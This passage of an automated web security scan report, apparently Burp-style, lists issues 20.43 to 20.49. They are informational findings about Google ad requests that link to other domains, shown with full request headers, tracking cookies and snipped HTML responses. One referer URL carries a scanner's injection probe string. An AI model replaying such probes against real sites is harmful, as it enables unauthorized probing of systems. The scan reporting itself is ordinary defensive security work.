User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 12:07:10 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12662
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/hmficweb.hinghammutual.com_80-billingview.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.icpa4kids.com/seminars%26adT%3DPediatric%2BSeminars%26adU%3DMetLife.com%26adT%3DMetLife%2BLife%2BInsurance%26adU%3Dwww.GerberLife.com%26adT%3DWhole%2BLife%2BKid%2BInsurance%26gl%3DUS&amp;usg=AFQjCNE7v8Qhk-mCGVKNPjDZp0qkd4chjQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.43. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098157&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.nutter.com_80.htm&dt=1301080156080&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080157132&frm=0&adk=1607234649&ga_vid=898506308.1301080157&ga_sid=1301080157&ga_hid=824163236&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=1080&xpc=9nAMVAsHm1&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:08:29 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4546
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k">
...[SNIP]...
gDwwb1AwIAAMQ%26num%3D1%26sig%3DAGiWqtwaX_Zm5ZNvnRuvuiqjcrjQoUnM2Q%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBprLpLeiMTbqPN4yBlgfVxdDaBtbuheEBnru7zhGWk9-WSbDzexABGAEgvs7lDTgAUI3b18UEYMkGoAHu8sn5A7oBCTcyOHg5MF9hc8gBBNoBOGZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3Lm51dHRlci5jb21fODAuaHRtgAIBuAIYwAIFyAL-7JMUqAMB6APHBugDwwb1AwIAAMQ%26num%3D1%26sig%3DAGiWqtwaX_Zm5ZNvnRuvuiqjcrjQoUnM2Q%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/www.nutter.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNE2WuQQyFKkUvE5NJClzAJKcLUDPw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.44. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163107&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145132540&bpp=12&shv=r20110315&jsv=r20110321-2&correlator=1301145132587&frm=0&adk=1819763764&ga_vid=1330312250.1301145133&ga_sid=1301145133&ga_hid=933906788&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=69&xpc=osx2yFHZwq&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 13:11:25 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12181
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/acunetix/1and1-acu.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Top10HostingList.com%26adT%3DBest%2B10%2BWeb%2BHosting%2BSites%26adU%3Dwww.Google.com/AdWords%26adT%3DFree%2BOnline%2BAdvertising%26adU%3Dwww.Datapipe.com%26adT%3DSilicon%2BValley%2BColocation%26gl%3DUS&amp;usg=AFQjCNGYOPIjPA-nMRTb8uzT2I8lSgYbvw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.45. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098423&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.bluestarfibres.com_80.htm&dt=1301080423019&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080423111&frm=0&adk=1607234649&ga_vid=2006162341.1301080423&ga_sid=1301080423&ga_hid=800117673&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=166&xpc=n6AlwetjOH&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:12:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12353
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/www.bluestarfibres.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DOfficeMax.com/Pens%26adT%3DOfficeMax%2BHas%2BPens%26adU%3DPositivePromotions.com%26adT%3DPositive%2BPromotions%26adU%3Dwww.Mentor.com/Techpubs%26adT%3DFiber%2BWeave%26gl%3DUS&amp;usg=AFQjCNEUI4fVszvbTy_GhkVvgeWeFR7N-g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.46. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098688&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Flfi-local-file-inclusion-example-poc-execution.htm&dt=1301080688896&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080688940&frm=0&adk=1607234649&ga_vid=2070939314.1301080689&ga_sid=1301080689&ga_hid=217636455&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=199&xpc=Sq2iardM5s&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:17:20 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12636
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/lfi-local-file-inclusion-example-poc-execution.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.AmsterdamPrinting.com%26adT%3D7%25C2%25A2%2BPromotional%2BPens%26adU%3Dwww.jensonprint.com%26adT%3DPlastic%2BLuggage%2BTags%26adU%3DPrintPlace.com%26adT%3DPrint%2BPlace%2BPrinting%26gl%3DUS&amp;usg=AFQjCNEWFIS-faKHjKaYHRF8Qsy06R0Jgg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.47. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301117945&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Ftodays-top-stories&dt=1301099994443&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301099994480&frm=0&adk=3965760877&ga_vid=40288628.1301099994&ga_sid=1301099994&ga_hid=88748631&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=952&ref=http%3A%2F%2Fwww.soundingsonline.com%2Fboat-shop%2Fq-a-a&fu=0&ifi=1&dtd=75&xpc=KwQf6QBQYz&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 00:39:06 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4007
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.soundingsonline.com/news/todays-top-stories%26hl%3Den%26client%3Dca-pub-5812731941170583%26adU%3DIntlCardService.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF1IvQNufD_s8MaNupMMHfe2AqeRA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.48. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301099580&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.nutter.com_80.htm&dt=1301081580761&bpp=5&shv=r20110315&jsv=r20110321-2&correlator=1301081580799&frm=0&adk=1607234649&ga_vid=1043164592.1301081581&ga_sid=1301081581&ga_hid=1137813725&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=227&xpc=HgRk7mjPqW&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:32:12 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12044
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/www.nutter.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.business.com%26adT%3DPromotional%2BKey%2BRings%26adU%3Dwww.jsbusinessproducts.com%26adT%3DPrinted%2BMemo%2BPads%26adU%3DGreenProducts.ws%26adT%3DGreen%2BLogo%2BPromo%2BProducts%26gl%3DUS&amp;usg=AFQjCNHZM6B2g1kx2Xm8Q_NKzNRW0x4_Vg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.49. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301117934&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Fboat-shop%2Fq-a-a&dt=1301099984483&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301099984556&frm=0&adk=3965760877&ga_vid=693334650.1301099985&ga_sid=1301099985&ga_hid=1001098695&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1426&bih=952&ref=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F'%2BNSFTW%2B'%3Fordering%3D%26searchphrase%3Dall&fu=0&ifi=1&dtd=92&xpc=c8T4opH8r5&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 00:38:58 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 2241
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/256163696/direct/01/1557190323?click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBu_OooTWNTYPAMsrtlQfXjOGgCKbV2egBlofdphaero6XTgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAGalLXsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gEuaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2JvYXQtc2hvcC9xLWEtYZgC4h3AAgXIAtyH9gmoAwHoA8sD9QMAAADE%26num%3D1%26sig%3DAGiWqtyrwT5xP3OEAfvyZmG47Ddcr8uMNw%26client%3Dca-pub-5812731941170583%26adurl%3D">
</script>
...[SNIP]...
